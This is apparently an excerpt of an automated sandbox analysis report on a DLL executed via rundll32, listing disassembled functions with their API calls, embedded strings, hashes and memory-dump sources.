                                                                                                                                  • API ID: free$setlocalestd::_$Locinfo::_$ErrorFreeGetcvtHeapLastLocinfo_ctorLocinfo_dtorLockitLockit::____lc_codepage_func___lc_locale_name_func___mb_cur_max_func_errno_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3682056076-0
                                                                                                                                  • Opcode ID: ca3fb0b8572f38f04c8e7f887ed93a46820372b37fb06955fdddff351c3b93c0
                                                                                                                                  • Instruction ID: 0d852a346218120d3da4cb41429ba606f2c3b38bf25389faa73f1b0c9af31080
                                                                                                                                  • Opcode Fuzzy Hash: ca3fb0b8572f38f04c8e7f887ed93a46820372b37fb06955fdddff351c3b93c0
                                                                                                                                  • Instruction Fuzzy Hash: 87416B32B45B8889EB52DBB4D4503DC33B9AB687C8F05811AAA4927A9ADE70C659C340
                                                                                                                                  Function 00007FFD92DB4E80 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 244COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s: CreateEncoder failed with error - %x$%s: Invalid - %d buffer format passed$%s: Invalid pTrContext pointer passed$%s: Invalid size, possible wrong format $%s: Not able to create system memory buffer. Error - %x$CNvVideoTranscodeEx::AllocateUncompressedBuffersandEncoder$`anonymous-namespace'::GetDestBufferSizePerFormat
                                                                                                                                  • API String ID: 0-2103758211
                                                                                                                                  • Opcode ID: c1d11ccd792c239f3aef7748e9f0e087da3cd850e3c7ca25cdce25fa5a2da61b
                                                                                                                                  • Instruction ID: d65460f846c7b7ba67f06feada4198ce693e171f4f4b5bb675947cae83790798
                                                                                                                                  • Opcode Fuzzy Hash: c1d11ccd792c239f3aef7748e9f0e087da3cd850e3c7ca25cdce25fa5a2da61b
                                                                                                                                  • Instruction Fuzzy Hash: 17B1BCB2B08A4282FB30DFA4E8A13B933A4EB94B49F444135CE5D4769ADE7EE505C350
                                                                                                                                  Function 00007FFD92DC5A10 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 187COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: LocateXStateFeature$MessageBoxA$MessageBoxW$RoInitialize
                                                                                                                                  • API String ID: 2742660187-29969376
                                                                                                                                  • Opcode ID: 0c7dc754282232751ae50603538382f2149499098d56100760ace1ac31c63134
                                                                                                                                  • Instruction ID: f4d4f3cd2576693076502628eb7441f0cc559d8415540f188dc81d886c7a4ece
                                                                                                                                  • Opcode Fuzzy Hash: 0c7dc754282232751ae50603538382f2149499098d56100760ace1ac31c63134
                                                                                                                                  • Instruction Fuzzy Hash: 90416B61B08B82C2FA249FC2B8601E6A364FF59BC0F584536EE5C17B9ACE7CE545D740
                                                                                                                                  Function 00007FFD92DB1990 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$Free$AddressAllocConditionErrorInfoLastMaskProcVerifyVersion
                                                                                                                                  • String ID: Advapi32.dll$CreateProcessAsUserA
                                                                                                                                  • API String ID: 3397555361-3368371401
                                                                                                                                  • Opcode ID: 7493b9120896b692fd6b8bb541b1dc1633219b3aa57d3fe30c3548db32e78fe2
                                                                                                                                  • Instruction ID: 12295c5ef2555e1960d2ea1bf91983abd6679131f7be22cd02f9d80d6a63ea0a
                                                                                                                                  • Opcode Fuzzy Hash: 7493b9120896b692fd6b8bb541b1dc1633219b3aa57d3fe30c3548db32e78fe2
                                                                                                                                  • Instruction Fuzzy Hash: A3319276B09B8286EA75DF96B8A026A73A8FF48BC1F044139DD4D53B54DF3DE0119B00
                                                                                                                                  Function 00007FFD92EE0D00 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressDirectoryLocalProcSystem$AllocErrorFreeLastLibraryLoad
                                                                                                                                  • String ID: Advapi32.dll$RegCloseKey$RegOpenKeyExW
                                                                                                                                  • API String ID: 2875399084-618571997
                                                                                                                                  • Opcode ID: 28f397e54f1e24d26005662e88986d0bf696a147c640b84549ea0515995ecd5d
                                                                                                                                  • Instruction ID: fa35175eb73ddd9ec025dc4b2125bf0d82251b50aa0eb3fdd1b43ed67099f0c4
                                                                                                                                  • Opcode Fuzzy Hash: 28f397e54f1e24d26005662e88986d0bf696a147c640b84549ea0515995ecd5d
                                                                                                                                  • Instruction Fuzzy Hash: E0315C21B19B8282FA709F96F8B477962A8BF49BD1F480035DD4D63B64EF7DE4019700
                                                                                                                                  Function 00007FFD92ED2840 Relevance: 13.8, APIs: 11, Instructions: 100memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Local$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 916652521-0
                                                                                                                                  • Opcode ID: f94a255190e780f5afcc3f384cf0fa8bf01a32dacb228848ed0e42394d41a5f4
                                                                                                                                  • Instruction ID: 3bd8643ea9a317f33a44d79a7d26a8b831fe955a2bd079328e21857984f7e18c
                                                                                                                                  • Opcode Fuzzy Hash: f94a255190e780f5afcc3f384cf0fa8bf01a32dacb228848ed0e42394d41a5f4
                                                                                                                                  • Instruction Fuzzy Hash: 5841B351B0C70342FB755FE6A56023962A4AF49BD1F044239DD0E57FD6DE7EE4419310
                                                                                                                                  Function 00007FFD92DC35F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 179COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - invalid bits-per-sample (bits) '%d'$%s No audio initialization data passed, returning error$%s invalid bitrate (kbps) '%d'$%s- invalid channel count '%d$%s- invalid sample rate (hz) '%d$CNvMFAACEncoder::InitializeMFTandMediaTypes
                                                                                                                                  • API String ID: 0-3830295964
                                                                                                                                  • Opcode ID: b58d4a504f29bfbd919c47ccc5bda832fbb375b0432de0edfb3321c01ac5011a
                                                                                                                                  • Instruction ID: ec8493ec2f62c5feb117dbb0583101e7a47f85190b2bd6d454ef32789eb95f1b
                                                                                                                                  • Opcode Fuzzy Hash: b58d4a504f29bfbd919c47ccc5bda832fbb375b0432de0edfb3321c01ac5011a
                                                                                                                                  • Instruction Fuzzy Hash: BD816032B18A4682FB70CF95E4A02A97774FB84B85F414136EA9D53BA8DF7DE454C700
                                                                                                                                  Function 000000018000E7F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3320480354-3145022300
                                                                                                                                  • Opcode ID: 997303cdb5246af4f3804dbc33bfa6d28888dcc0a64c4145d567fdc2599bd8a0
                                                                                                                                  • Instruction ID: 7396700a3e2aa9f6dcc0ca259bbfacf4549d370ee844549db4e676bec1950651
                                                                                                                                  • Opcode Fuzzy Hash: 997303cdb5246af4f3804dbc33bfa6d28888dcc0a64c4145d567fdc2599bd8a0
                                                                                                                                  • Instruction Fuzzy Hash: 35315E31604A8881FA97DB15E4503D97761F798BE0F58C322FA6D176E9DF38C68AC700
                                                                                                                                  Function 000000018000F048 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3809448442-3145022300
                                                                                                                                  • Opcode ID: 2f04781c0b5e18591815ebcc6c292dda38492b9e83a825390bd61a302c4df626
                                                                                                                                  • Instruction ID: 2e1ae5781fe8c05b86cdc7ffb40e0608430781eac327408133958ab252574f1b
                                                                                                                                  • Opcode Fuzzy Hash: 2f04781c0b5e18591815ebcc6c292dda38492b9e83a825390bd61a302c4df626
                                                                                                                                  • Instruction Fuzzy Hash: 07314332604A4881EAA6DB15E4503E97760F798BE4F648322F66D03BE6DE38C68DD700
                                                                                                                                  Function 000000018000F898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: ba301de617691a25de1568d6629764ce47dc5661472e619ef08b9ca5d15eff40
                                                                                                                                  • Instruction ID: bf50277651feb23a4f13a6c5a880b1d27c86798fa76ed2e6007adde15329282e
                                                                                                                                  • Opcode Fuzzy Hash: ba301de617691a25de1568d6629764ce47dc5661472e619ef08b9ca5d15eff40
                                                                                                                                  • Instruction Fuzzy Hash: C1314F72604A4891FAA2DB15E4407E97760F79CBE0F148322FA6D13BE5DF38C68AD700
                                                                                                                                  Function 00000001800080D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: de1c21e832a76d84b7319f342fcfc80a87732f041ca1253d4a316bfc9e9b560d
                                                                                                                                  • Instruction ID: 747a8e2e6dad2d90b1f0716f744283a3e44b8922fd48889ad8a5bc8a8dfd0f0f
                                                                                                                                  • Opcode Fuzzy Hash: de1c21e832a76d84b7319f342fcfc80a87732f041ca1253d4a316bfc9e9b560d
                                                                                                                                  • Instruction Fuzzy Hash: 5D314F31604B4891FA93DB15E8503D973A5FB98BE4F588322FA9D076E5DE38C68E9700
                                                                                                                                  Function 0000000180023924 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3240839640-3145022300
                                                                                                                                  • Opcode ID: 34fdc018d8a8ec6bee2b747dce8489b826a34589efca71191b1f9c2b58655a0b
                                                                                                                                  • Instruction ID: 6f35ace6046a98efa2fc2a7e222986f193aa6cacab9ff511322773bfe6909e8d
                                                                                                                                  • Opcode Fuzzy Hash: 34fdc018d8a8ec6bee2b747dce8489b826a34589efca71191b1f9c2b58655a0b
                                                                                                                                  • Instruction Fuzzy Hash: 34318F72605A4C81FAD7DB15E4413D96360F39CBE0F548226FA9D036E5DE78CA8DC700
                                                                                                                                  Function 000000018000E928 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
